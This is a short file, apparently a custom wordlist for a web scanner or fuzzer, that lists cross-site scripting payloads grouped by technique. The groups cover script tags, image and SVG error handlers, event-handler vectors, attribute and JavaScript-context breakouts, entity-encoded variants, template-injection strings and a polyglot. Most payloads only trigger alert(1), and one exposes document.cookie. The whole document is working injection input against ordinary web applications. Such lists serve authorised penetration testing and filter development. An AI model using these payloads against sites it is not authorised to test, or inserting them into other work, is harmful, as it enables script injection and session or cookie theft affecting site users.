# Custom XSS Payloads
# One payload per line – lines starting with # are comments

# Basic alert variants
<script>alert(1)</script>
<script>alert(document.cookie)</script>
<script>confirm(1)</script>
<script>prompt(1)</script>

# Image-based
<img src=x onerror=alert(1)>
<img/src=x onerror=alert(1)>
<img src=x onerror="alert(String.fromCharCode(88,83,83))">

# SVG-based
<svg onload=alert(1)>
<svg/onload=alert(1)>
<svg><script>alert(1)</script></svg>

# Event handlers
<body onload=alert(1)>
<input onfocus=alert(1) autofocus>
<details open ontoggle=alert(1)>
<video><source onerror=alert(1)>
<audio src=x onerror=alert(1)>
<marquee onstart=alert(1)>
<select onfocus=alert(1) autofocus>

# Attribute breakout
"><script>alert(1)</script>
'><script>alert(1)</script>
"><img src=x onerror=alert(1)>
" onfocus="alert(1)" autofocus="
' onfocus='alert(1)' autofocus='

# JavaScript context breakout
';alert(1);//
";alert(1);//
\\';alert(1);//
</script><script>alert(1)</script>

# Encoded payloads
<img src=x onerror=&#97;&#108;&#101;&#114;&#116;(1)>
<svg/onload=&#97;&#108;&#101;&#114;&#116;(1)>

# Template injection
{{constructor.constructor('alert(1)')()}}
${alert(1)}
#{alert(1)}

# Polyglot
jaVasCript:/*-/*`/*\\`/*'/*"/**/(/* */oNcliCk=alert() )//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/--!>\\x3csVg/<sVg/oNloAd=alert()//>\\x3e
